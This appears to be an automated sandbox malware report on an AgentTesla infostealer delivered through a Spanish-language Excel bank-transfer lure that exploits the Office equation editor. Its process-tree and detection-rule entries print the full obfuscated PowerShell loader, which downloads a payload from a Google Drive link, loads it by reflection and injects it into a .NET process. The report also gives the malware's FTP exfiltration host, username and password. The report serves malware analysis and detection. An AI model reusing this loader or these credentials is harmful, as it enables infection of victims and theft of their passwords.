Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
transferencia interbancaria_66579.xlam.xlsx

Overview

General Information

Sample name:transferencia interbancaria_66579.xlam.xlsx
Analysis ID:1540840
MD5:c2a1f2f11eafc8f0faa2480b44d95d7d
SHA1:4aacb955102f10f5c66089fd097f22a633360383
SHA256:bf04af05000e8205dad105999af809b1031eeb438aff45e36ae9ab416d669002
Tags:xlamxlsxuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3496 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3700 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3840 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightdatingloverxxx.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • AddInProcess32.exe (PID: 3136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bd2:$s1: <legacyDrawing r:id="
  • 0x1bfa:$s2: <oleObject progId="
  • 0x1c38:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.628239471.00000000023C5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            8.2.powershell.exe.723ab28.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.powershell.exe.723ab28.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                8.2.powershell.exe.723ab28.0.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.2.powershell.exe.723ab28.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x34429:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3449b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x34525:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x345b7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x34621:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x34693:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x34729:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x347b9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  8.2.powershell.exe.723ab28.0.raw.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x31623:$s2: GetPrivateProfileString
                  • 0x30cdb:$s3: get_OSFullName
                  • 0x3234c:$s5: remove_Key
                  • 0x324e3:$s5: remove_Key
                  • 0x3347a:$s6: FtpWebRequest
                  • 0x3440b:$s7: logins
                  • 0x3497d:$s7: logins
                  • 0x376f6:$s7: logins
                  • 0x37740:$s7: logins
                  • 0x39095:$s7: logins
                  • 0x382da:$s9: 1.85 (Hash, version 2, native byte-order)
                  Click to see the 9 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 107.172.31.13, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3700, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3700, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\NIGHTTTTMPDW-constraints[1].vbs

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0LkluZGV4T2Yoa0Z2c3RhcnRGbGFnKTtrRicrJ3ZlbmRJbmRleCA9IGtGdmltYWdlVGV4dC5JJysnbmRleE9mKGtGdmVuZEZsJysnYWcpO2tGdnN0YXJ0SW5kZXggLWdlIDAgLScrJ2EnKyduZCBrRnZlbmRJbmRleCAnKyctZ3Qga0Z2c3RhcnRJbmRleDtrRnZzdGFydEluZGV4ICs9IGtGdnN0YXJ0RmxhZy5MZW5ndGg7a0Z2YmFzZTY0TGVuZ3RoID0ga0Z2ZW5kSW5kZXggLSBrRnZzdGFydEluZGV4O2tGdmJhc2U2NENvbW1hbmQgPSBrRnZpbWFnZVRleHQuU3Vic3RyaW5nKGtGdnN0YXJ0SW5kJysnZXgsIGtGdmJhc2U2NExlbmd0aCk7a0Z2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoa0Z2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIHc1JysnYyBGb3JFYWNoLU9iamVjdCB7IGtGdl8gfSlbLTEuLi0oa0Z2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtrRnZjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tJysnQmFzZTY0U3RyaW5nKGtGdmJhc2U2NFJldmVyc2UnKydkKTtrRnZsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZScrJ20uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoa0Z2Y29tbWFuZEJ5dGVzKTtrRnZ2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKGd3MFZBSWd3MCk7a0Z2dmFpTWV0aG9kLkludm9rZShrRnYnKydudWxsLCBAKGd3MHR4dC5hYWFhYWJld21hZGFtLzMxLjEnKyczLjI3MS43MCcrJzEvLzpwdHRoJysnZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZScrJ3NhdGl2YWRvZ3cwLCBndzBkZXNhdGl2YWRvZ3cwLCBndzBBZGRJblByb2Nlc3MzMmd3MCwgZ3cwZGVzYXRpdmFkb2d3MCwgZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvJysnZ3cwLGd3MGRlc2F0aXZhJysnZG9ndzAsZ3cwZGVzYXRpdmFkb2d3MCxndzBkZXNhdGl2YWRvZ3cwLGd3MGRlc2F0aXZhZG9ndzAsZ3cwMWd3MCxndzBkZXNhdGl2YWRvZ3cwKScrJyk7JykuUmVQbGFDZSgndzVjJyxbU3RySW5HXVtDaEFSXTEyNCkuUmVQbGFDZSgna0Z2JywnJCcpLlJlUGxhQ2UoKFtDaEFSXTEwMytbQ2hBUl0xMTkrW0NoQVJdNDgpLFtTdHJJbkddW0NoQVJdMzkpIHwgJiAoKHZhcklBQkxFICcqTWRyKicpLk5hbWVbMywxMSwyXS1KT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdrRnZpbWFnZVVybCcrJyA9ICcrJ2d3MGh0dHBzOi8vZHJpdmUuZ29vZ2xlLicrJ2NvJysnbS91Yz9leHAnKydvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRCcrJ3ZVaEJZd3VyIGd3MDtrRnYnKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2wnKydpZW50O2tGJysndmltYScrJ2dlQnl0ZXMgPSAnKydrRnZ3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKGtGdmltYWdlVXJsKTtrRnZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRScrJ25jb2RpbmddOjpVVEY4LkdldFN0cmluJysnZyhrRnZpbWFnZUJ5dGVzKTtrRnZzdGFydEZsYWcgPSBndzA8PEJBU0U2NF9TVEFSVD4+Z3cwO2tGdmVuZCcrJ0ZsYWcgPSBndzA8PEJBJysnU0U2NF9FTkQ+Pmd3MDtrRnZzdGFydEluZGUnKyd4ID0ga0Z2aW1hZ2VUZXh0Lklu
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3700, Protocol: tcp, SourceIp: 107.172.31.13, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kFvimageUrl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1AIVgJJJv1F6vS4sUOybnH-sD'+'vUhBYwur gw0;kFv'+'webClient = New-Object System.Net.WebCl'+'ient;kF'+'vima'+'geBytes = '+'kFvwebClient.'+'DownloadData(kFvimageUrl);kFvimageText = [System.Text.E'+'ncoding]::UTF8.GetStrin'+'g(kFvimageBytes);kFvstartFlag = gw0<<BASE64_START>>gw0;kFvend'+'Flag = gw0<<BA'+'SE64_END>>gw0;kFvstartInde'+'x = kFvimageText.IndexOf(kFvstartFlag);kF'+'vendIndex = kFvimageText.I'+'ndexOf(kFvendFl'+'ag);kFvstartIndex -ge 0 -'+'a'+'nd kFvendIndex '+'-gt kFvstartIndex;kFvstartIndex += kFvstartFlag.Length;kFvbase64Length = kFvendIndex - kFvstartIndex;kFvbase64Command = kFvimageText.Substring(kFvstartInd'+'ex, kFvbase64Length);kFvbase64Reversed = -join (kFvbase64Command.ToCharArray()'+' w5'+'c ForEach-Object { kFv_ })[-1..-(kFvbase64Command.Length)];kFvcommandBytes = [System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'
